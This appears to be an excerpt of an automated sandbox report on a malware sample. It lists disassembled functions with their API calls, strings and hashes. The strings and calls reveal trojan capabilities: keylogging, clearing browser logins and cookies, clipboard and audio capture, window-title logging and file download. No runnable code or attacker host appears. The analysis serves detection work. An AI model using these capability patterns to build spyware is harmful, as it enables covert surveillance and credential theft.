                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetLastInputInfo$User32.dll
                                      • API String ID: 2574300362-1519888992
                                      • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                      • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                      • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                      • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                      • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                      • API String ID: 3472027048-1236744412
                                      • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                      • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                      • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                      • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                        • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                        • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                      • Sleep.KERNEL32(000001F4), ref: 0040A573
                                      • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$ForegroundLength
                                      • String ID: [ $ ]
                                      • API String ID: 3309952895-93608704
                                      • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                      • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                      • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                      • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                      • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                      • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                      • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                      • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                      • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                      • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                      • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                      • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                      • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                      • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcess
                                      • String ID:
                                      • API String ID: 39102293-0
                                      • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                      • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                      • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                      • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                        • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                      • _UnwindNestedFrames.LIBCMT ref: 00439891
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                      • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0
                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                      • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                      • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                      • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MetricsSystem
                                      • String ID:
                                      • API String ID: 4116985748-0
                                      • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                      • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                      • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                      • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                        • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                      Download Yara Rule
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHandling__start
                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525
                                      • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                      • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                      • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                      • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449E3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                                      • GetLastError.KERNEL32 ref: 00449F2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide
                                      • String ID: PkGNG
                                      • API String ID: 203985260-263838557
                                      • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                      • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                                      • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                      • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                      • __Init_thread_footer.LIBCMT ref: 0040B797
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                      • API String ID: 1881088180-3686566968
                                      • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                      • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                      • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                      • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ACP$OCP
                                      • API String ID: 0-711371036
                                      • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                      • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                      • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                      • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                      • GetLastError.KERNEL32 ref: 0044B804
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID: PkGNG
                                      • API String ID: 442123175-263838557
                                      • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                      • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                      • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                      • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                      • GetLastError.KERNEL32 ref: 0044B716
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID: PkGNG
                                      • API String ID: 442123175-263838557
                                      • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                      • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                      • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                      • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 481472006-1507639952
                                      • Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                                      • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                      • Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                                      • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32 ref: 00416640
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DownloadFileSleep
                                      • String ID: !D@
                                      • API String ID: 1931167962-604454484
                                      • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                      • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                      • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                      • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: alarm.wav$hYG
                                      • API String ID: 1174141254-2782910960
                                      • Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                                      • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                      • Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                                      • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                      • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                      • String ID: Online Keylogger Stopped
                                      • API String ID: 1623830855-1496645233
                                      • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                      • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                      • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                      • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx$PkGNG
                                      • API String ID: 2568140703-1065776982
                                      • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                      • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                      • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                      • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                      • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$BufferHeaderPrepare
                                      • String ID: XMG
                                      • API String ID: 2315374483-813777761
                                      • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                      • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                      • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                      • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocaleValid
                                      • String ID: IsValidLocaleName$JD
                                      • API String ID: 1901932003-2234456777
                                      • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                      • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                      • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                      • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

